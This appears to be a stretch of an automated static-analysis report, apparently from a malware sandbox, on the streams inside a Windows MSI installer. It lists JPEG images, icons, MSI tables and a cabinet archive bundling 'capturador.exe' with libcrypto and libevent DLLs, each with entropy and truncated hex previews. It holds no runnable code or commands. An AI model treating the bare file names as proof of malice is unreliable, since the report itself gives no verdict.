                                                Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                                Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                                Stream Path: \x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14440\x14658\x17278\x17075, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 625x395, frames 3, Stream Size: 16673
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14440\x14658\x17278\x17075
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 625x395, frames 3
                                                Stream Size:16673
                                                Entropy:7.30816983161
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                                Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                                Stream Path: \x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14504\x14336\x17278\x17075, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1875x1185, frames 3, Stream Size: 69692
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14504\x14336\x17278\x17075
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1875x1185, frames 3
                                                Stream Size:69692
                                                Entropy:6.08285538491
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                                Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                                Stream Path: \x17163\x16689\x18229\x16894\x16684\x17583\x18346\x17645\x18474, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x316, frames 3, Stream Size: 12626
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x17645\x18474
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x316, frames 3
                                                Stream Size:12626
                                                Entropy:7.45034483136
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                                Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                                Stream Path: \x17163\x16689\x18229\x16958\x16827\x16687\x17200\x18470, File Type: MS Windows icon resource - 1 icon, 32x32, 16 colors, Stream Size: 766
                                                General
                                                Stream Path:\x17163\x16689\x18229\x16958\x16827\x16687\x17200\x18470
                                                File Type:MS Windows icon resource - 1 icon, 32x32, 16 colors
                                                Stream Size:766
                                                Entropy:3.3484862649
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 3 1 . . . . . . . . . . . . 3 3 2 3 3 3 3 3 3 3 3 3 3 3 3 . 3 3 $ D D D D D D D D D D D @ 1 . 2 D D D D D D D D D D D D D . . 2 D D D D D D @ D D D D D D C . 2 D D D D D D 3 4 D D D D D C . 2 D D D D D @ 3 0 D D D D D . . 3 $ D D D D D 3 4 D D D D D 1 . 3 $
                                                Data Raw:00 00 01 00 01 00 20 20 10 00 00 00 00 00 e8 02 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 c0 c0 00 80 80 80 00 00 80 80 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 33
                                                Stream Path: \x17163\x16689\x18229\x17214\x17009\x18482, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 16x16, 16 colors, Stream Size: 1078
                                                General
                                                Stream Path:\x17163\x16689\x18229\x17214\x17009\x18482
                                                File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 16x16, 16 colors
                                                Stream Size:1078
                                                Entropy:2.86422695486
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . ( . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . w p . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . p . . . . . . . . . . w w . . . w w . . . . . .
                                                Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 10 10 10 00 00 00 00 00 28 01 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 80 80 80 00 c0 c0 c0 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                                Stream Path: \x17163\x16689\x18229\x17214\x17841\x17207\x17574\x18481, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32, Stream Size: 2998
                                                General
                                                Stream Path:\x17163\x16689\x18229\x17214\x17841\x17207\x17574\x18481
                                                File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                                Stream Size:2998
                                                Entropy:4.40653521205
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . . w . . . . . . . . . . p . . x . . . . w . . . . . . . . x . . . w . . w . . . . . . . p . . x x . . w ~ . . . . . . . . x . . . . . ~ . . . . . . .
                                                Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                                Stream Path: \x17163\x16689\x18229\x17790\x17448\x18034\x16812\x18482, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32, Stream Size: 2998
                                                General
                                                Stream Path:\x17163\x16689\x18229\x17790\x17448\x18034\x16812\x18482
                                                File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                                Stream Size:2998
                                                Entropy:4.92283562852
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . w w . . . . . . . . . . . . w . f . w . . . . . . w . . . . . v v f . w . . . . . . . . . . . n f f l . w . . . .
                                                Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                                Stream Path: \x17163\x16689\x18229\x17790\x17640\x17188\x17205\x18470, File Type: MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32, Stream Size: 2998
                                                General
                                                Stream Path:\x17163\x16689\x18229\x17790\x17640\x17188\x17205\x18470
                                                File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                                Stream Size:2998
                                                Entropy:4.6676615263
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . . . . . p . . . . . . . . . . x . { . w p . . . . . . . . ( . . . { . w . . . . . . . . . ( x x x . . . . . . . . . . .
                                                Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                                Stream Path: \x17163\x16689\x18229\x17918\x16740\x16677\x17318, File Type: PC bitmap, Windows 3.x format, 1 x 200 x 24, Stream Size: 854
                                                General
                                                Stream Path:\x17163\x16689\x18229\x17918\x16740\x16677\x17318
                                                File Type:PC bitmap, Windows 3.x format, 1 x 200 x 24
                                                Stream Size:854
                                                Entropy:3.80253159876
                                                Base64 Encoded:False
                                                Data ASCII:B M V . . . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:42 4d 56 03 00 00 00 00 00 00 36 00 00 00 28 00 00 00 01 00 00 00 c8 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ef f3 f4 00 ef f3 f4 00 ef f3 f4 00 ef f4 f4 00 ef f4 f4 00 ef f4 f5 00 ef f4 f5 00 ef f4 f5 00 ef f4
                                                Stream Path: \x17191\x17334\x18305\x16678\x18469, File Type: Microsoft Cabinet archive data, 5018326 bytes, 14 files, Stream Size: 5018326
                                                General
                                                Stream Path:\x17191\x17334\x18305\x16678\x18469
                                                File Type:Microsoft Cabinet archive data, 5018326 bytes, 14 files
                                                Stream Size:5018326
                                                Entropy:7.99897032055
                                                Base64 Encoded:True
                                                Data ASCII:M S C F . . . . . . L . . . . . , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S i . c a p t u r a d o r . e x e . . . . . . . . . . . . R q . . c a p t u r a d o r . e x e . c o n f i g . . . 7 . . . . . . . . R ` v . l i b c r y p t o 1 _ 1 . d l l . L . . . . > 8 . . . . R ` v . l i b e v e n t _ c o r e 2 1 7 . d l l . . l . . . G . . . . R ` v . l i b e v e n t _ e x t r a 2 1 7 . d l l . . t . . . . Q . . . . R ` v . l i b e v e n t 2 1 7 . d l l . . . .
                                                Data Raw:4d 53 43 46 00 00 00 00 d6 92 4c 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 0e 00 00 00 d2 04 00 00 ea 01 00 00 c7 01 01 00 00 86 00 00 00 00 00 00 00 00 13 53 20 69 20 00 63 61 70 74 75 72 61 64 6f 72 2e 65 78 65 00 bd 00 00 00 00 86 00 00 00 00 fc 52 71 ae 20 00 63 61 70 74 75 72 61 64 6f 72 2e 65 78 65 2e 63 6f 6e 66 69 67 00 c6 b7 37 00 bd 86 00 00 00 00 ce 52 60 76 20
                                                Stream Path: \x18496\x15167\x17394\x17464\x17841, File Type: data, Stream Size: 1312
                                                General
                                                Stream Path:\x18496\x15167\x17394\x17464\x17841
                                                File Type:data
                                                Stream Size:1312
                                                Entropy:5.12159211023
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . ; . ; . < . < . B . B . B . P . P . . . . . . . n . n . n . o . o . o . x . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . 2 . 2 . 8 . 8 . @ . @ . @ . @ . @ . B . B . B . B . B . B . I . I . I .
                                                Data Raw:04 00 04 00 04 00 04 00 04 00 04 00 07 00 07 00 07 00 11 00 11 00 11 00 1b 00 1b 00 3b 00 3b 00 3c 00 3c 00 42 00 42 00 42 00 50 00 50 00 d1 02 d1 02 d1 02 6e 03 6e 03 6e 03 6f 03 6f 03 6f 03 78 03 78 03 8f 03 8f 03 8f 03 8f 03 92 03 92 03 92 03 92 03 92 03 c3 03 c3 03 c3 03 c3 03 c3 03 c3 03 c3 03 c3 03 c3 03 c3 03 c3 03 c3 03 a1 04 a1 04 a1 04 a1 04 a4 04 a4 04 a4 04 a4 04 ac 04
                                                Stream Path: \x18496\x15518\x16925\x17915, File Type: data, Stream Size: 444
                                                General
                                                Stream Path:\x18496\x15518\x16925\x17915
                                                File Type:data
                                                Stream Size:444
                                                Entropy:5.37821201406
                                                Base64 Encoded:False
                                                Data ASCII:O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . # . % . ' . ) . + . - . / . 1 . 3 . 5 . 7 . 9 . ; . = . ? . A . C . E . G . I . K . M . O . P . R . S . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . .
                                                Data Raw:4f 00 89 06 8c 06 8e 06 8f 06 91 06 92 06 94 06 96 06 97 06 99 06 9a 06 9c 06 9d 06 9f 06 a0 06 a2 06 a4 06 a6 06 a8 06 aa 06 ac 06 ae 06 b0 06 b2 06 b4 06 b6 06 b8 06 ba 06 bc 06 be 06 c0 06 c2 06 c4 06 c6 06 c7 06 c9 06 cb 06 cd 06 cf 06 d1 06 d2 06 d4 06 d6 06 d8 06 da 06 dc 06 de 06 e0 06 e2 06 e4 06 e6 06 e8 06 ea 06 ec 06 ee 06 ef 06 f1 06 f3 06 f5 06 f7 06 f9 06 fb 06 fc 06
                                                Stream Path: \x18496\x16191\x17783\x17516\x15210\x17892\x18468, File Type: data, Stream Size: 89277
                                                General
                                                Stream Path:\x18496\x16191\x17783\x17516\x15210\x17892\x18468
                                                File Type:data
                                                Stream Size:89277
                                                Entropy:5.01588896469
                                                Base64 Encoded:True
                                                Data ASCII:A t t r i b u t e s D i r e c t o r y _ C o m p o n e n t I d C o m p o n e n t T y p e A c t i o n C o n d i t i o n S e q u e n c e C o s t F i n a l i z e C o s t I n i t i a l i z e T a b l e N a m e I n s t a l l F i n a l i z e I n s t a l l I n i t i a l i z e I n s t a l l V a l i d a t e A d v t E x e c u t e S e q u e n c e C r e a t e S h o r t c u t s M s i P u b l i s h A s s e m b l i e s P u b l i s h C o m p o n e n t s P u b l i s h F e a t u r e s P u b l i s h P r o d u c t R e g i s t e
                                                Data Raw:41 74 74 72 69 62 75 74 65 73 44 69 72 65 63 74 6f 72 79 5f 43 6f 6d 70 6f 6e 65 6e 74 49 64 43 6f 6d 70 6f 6e 65 6e 74 54 79 70 65 41 63 74 69 6f 6e 43 6f 6e 64 69 74 69 6f 6e 53 65 71 75 65 6e 63 65 43 6f 73 74 46 69 6e 61 6c 69 7a 65 43 6f 73 74 49 6e 69 74 69 61 6c 69 7a 65 54 61 62 6c 65 4e 61 6d 65 49 6e 73 74 61 6c 6c 46 69 6e 61 6c 69 7a 65 49 6e 73 74 61 6c 6c 49 6e 69 74
                                                Stream Path: \x18496\x16191\x17783\x17516\x15978\x17586\x18479, File Type: data, Stream Size: 7516
                                                General
                                                Stream Path:\x18496\x16191\x17783\x17516\x15978\x17586\x18479
                                                File Type:data
                                                Stream Size:7516
                                                Entropy:3.46343255879
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . & . . . . . . . & . . . . . . . & . . . . . . . & . . . . . . . & . . . . . . . & . . . . . . . & . . . . . . . & . . . . . . . & . . . . . . . & . . . . . . . & . . . . . . . & . . . . . . . & . . . . . . . & . . . . . . . . . . . . . . . . . . . . . [ .
                                                Data Raw:e4 04 00 00 0a 00 0e 00 0a 00 06 00 0b 00 02 00 09 00 12 00 04 00 04 00 06 00 12 00 09 00 28 00 08 00 10 00 0c 00 06 00 0e 00 06 00 00 00 00 00 05 00 02 00 04 00 02 00 0f 00 03 00 11 00 03 00 0f 00 04 00 13 00 07 00 0f 00 03 00 14 00 03 00 11 00 03 00 0f 00 01 00 0e 00 01 00 11 00 03 00 15 00 03 00 10 00 03 00 12 00 03 00 0c 00 05 00 07 00 02 00 06 00 02 00 07 00 02 00 09 00 06 00
                                                Stream Path: \x18496\x16255\x16740\x16943\x18486, File Type: data, Stream Size: 72
                                                General
                                                Stream Path:\x18496\x16255\x16740\x16943\x18486
                                                File Type:data
                                                Stream Size:72
                                                Entropy:4.4568407108
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . ; . < . B . P . . . n . o . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . 8 . @ . B . I . . . . . . . . . . .
                                                Data Raw:04 00 07 00 11 00 1b 00 3b 00 3c 00 42 00 50 00 d1 02 6e 03 6f 03 78 03 8f 03 92 03 c3 03 a1 04 a4 04 ac 04 e8 04 ea 04 f3 04 f8 04 04 05 06 05 09 05 1e 05 32 05 38 05 40 05 42 05 49 05 be 05 cd 05 d6 05 e0 05 e4 05
                                                Stream Path: \x18496\x16383\x17380\x16876\x17892\x17580\x18481, File Type: data, Stream Size: 3936
                                                General
                                                Stream Path:\x18496\x16383\x17380\x16876\x17892\x17580\x18481
                                                File Type:data
                                                Stream Size:3936
                                                Entropy:3.301139152
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . ; . ; . < . < . B . B . B . P . P . . . . . . . n . n . n . o . o . o . x . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . 2 . 2 . 8 . 8 . @ . @ . @ . @ . @ . B . B . B . B . B . B . I . I . I .
                                                Data Raw:04 00 04 00 04 00 04 00 04 00 04 00 07 00 07 00 07 00 11 00 11 00 11 00 1b 00 1b 00 3b 00 3b 00 3c 00 3c 00 42 00 42 00 42 00 50 00 50 00 d1 02 d1 02 d1 02 6e 03 6e 03 6e 03 6f 03 6f 03 6f 03 78 03 78 03 8f 03 8f 03 8f 03 8f 03 92 03 92 03 92 03 92 03 92 03 c3 03 c3 03 c3 03 c3 03 c3 03 c3 03 c3 03 c3 03 c3 03 c3 03 c3 03 c3 03 a1 04 a1 04 a1 04 a1 04 a4 04 a4 04 a4 04 a4 04 ac 04
                                                Stream Path: \x18496\x16661\x17528\x17126\x17548\x16881\x17900\x17580\x18481, File Type: data, Stream Size: 16
                                                General
                                                Stream Path:\x18496\x16661\x17528\x17126\x17548\x16881\x17900\x17580\x18481
                                                File Type:data
                                                Stream Size:16
                                                Entropy:2.5
                                                Base64 Encoded:False
                                                Data ASCII:+ . : . < . > . 9 . ; . = . ? .
                                                Data Raw:2b 05 3a 05 3c 05 3e 05 39 05 3b 05 3d 05 3f 05
                                                Stream Path: \x18496\x16667\x17191\x15090\x17912\x17591\x18481, File Type: data, Stream Size: 36
                                                General
                                                Stream Path:\x18496\x16667\x17191\x15090\x17912\x17591\x18481
                                                File Type:data
                                                Stream Size:36
                                                Entropy:3.64160416787
                                                Base64 Encoded:False
                                                Data ASCII:q . q . . . . . . . . . . . . . . . . . @ . @ . . . . . . . . . . . . .
                                                Data Raw:71 04 71 04 01 80 02 80 df 04 82 06 05 80 05 80 05 80 19 80 40 81 40 81 14 80 0f 80 81 06 83 06 00 00 00 00
                                                Stream Path: \x18496\x16778\x17207\x17522\x16925\x17915, File Type: data, Stream Size: 420
                                                General
                                                Stream Path:\x18496\x16778\x17207\x17522\x16925\x17915
                                                File Type:data
                                                Stream Size:420
                                                Entropy:5.00034491149
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . E . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . $ . & . ( . * . , . / . 2 . 5 . 7 . : . = . @ . C . E . H . K . M . O . Q . S . U . X . Z . \\ . ^ . ` . b . d . f . h . j . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . % . ' . ) . + . - . 0 . 3 . 6 . 8 . ; . > . A . D . F . I . L . N . P . R . T .
                                                Data Raw:09 00 0a 00 10 00 12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00 1a 00 45 00 4c 00 d5 02 d7 02 dd 02 e1 02 e5 02 e7 02 ec 02 f1 02 f4 02 f9 02 fc 02 01 03 04 03 09 03 0c 03 0e 03 10 03 12 03 15 03 18 03 1b 03 1c 03 1f 03 22 03 24 03 26 03 28 03 2a 03 2c 03 2f 03 32 03 35 03 37 03 3a 03 3d 03 40 03 43 03 45 03 48 03 4b 03 4d 03 4f 03 51 03 53 03 55 03 58 03 5a 03 5c 03 5e 03 60 03
                                                Stream Path: \x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 48
                                                General
                                                Stream Path:\x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                File Type:data
                                                Stream Size:48
                                                Entropy:3.38186998233
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . " . & . . . . . . . . . . . . . . . . . . . . . . . . x . . . < . . .
                                                Data Raw:09 00 0a 00 0e 00 0f 00 10 00 1b 03 22 03 26 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 c8 99 dc 85 78 85 84 83 3c 8f a0 8f
                                                Stream Path: \x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 66
                                                General
                                                Stream Path:\x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472
                                                File Type:data
                                                Stream Size:66
                                                Entropy:3.70987593702
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . p . q . r . s . t . u . v . w . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:09 00 0a 00 1b 03 70 03 71 03 72 03 73 03 74 03 75 03 76 03 77 03 00 00 00 00 00 00 00 00 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 84 83 14 85 01 80 00 85 ce 84 ff 7f fd 7f 8c 80 fe 7f
                                                Stream Path: \x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 72
                                                General
                                                Stream Path:\x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472
                                                File Type:data
                                                Stream Size:72
                                                Entropy:3.44607361183
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . j . 8 . . . \\ . $ . . .
                                                Data Raw:09 00 0a 00 0e 00 0f 00 10 00 12 00 13 00 14 00 17 00 18 00 19 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 c8 99 dc 85 78 85 94 91 6a 98 38 98 f8 91 5c 92 24 93 c0 92
